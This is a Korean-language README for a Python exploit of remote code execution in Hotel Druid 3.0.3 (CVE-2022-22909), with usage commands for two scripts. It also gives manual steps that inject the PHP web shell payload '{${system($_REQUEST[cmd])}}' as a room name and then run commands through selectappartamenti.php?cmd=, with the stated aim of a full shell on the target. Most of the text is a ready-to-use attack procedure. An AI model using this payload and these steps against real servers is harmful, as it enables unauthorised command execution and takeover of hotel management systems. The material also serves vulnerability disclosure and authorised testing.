
Hotel Druid 3.0.3 원격 코드 실행(CVE-2022-22909)을 위한 Python 기반 익스플로잇. 객실 이름을 통해 PHP 페이로드를 주입하여 취약한 대상에서 명령 실행 및 셸 액세스를 달성합니다.
이 익스플로잇은 PHP 페이로드를 방 이름으로 사용하여 새 방을 생성합니다 .
사용법 :
$ ./HotelDruidExploit.py -h

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

이 익스플로잇은 방 이름을 이미 알고 있을 때 작동합니다 .
사용법 :
$ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

1). Hotel Druid 페이지로 이동합니다 .
2). Tables -> Rooms를 클릭합니다 .

3). 새 방 생성(Create New Room) 필드에 아래 PHP 코드를 추가한 후 , 추가(Add)를 클릭합니다 .
{${system($_REQUEST[cmd])}}

4). "방(Room)" 이름 필드에 우리 페이로드가 포함된 새 방이 표시됩니다 .

5). 아래 링크로 이동하면 명령 실행이 가능하며 , 이후 전체 셸을 얻을 수 있습니다 .
http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami
참고 : IP를 대상 Hotel Druid 서버의 IP로 변경하십시오 .
이 취약점은 방 이름이 /var/www/html/hoteldruid/dati/selectappartamenti.php 내부에 저장되기 때문에 발생합니다 .

그리고 selectappartamenti.php는 PHP 파일이므로 해당 파일 내의 모든 PHP 코드가 서버에 의해 실행됩니다 .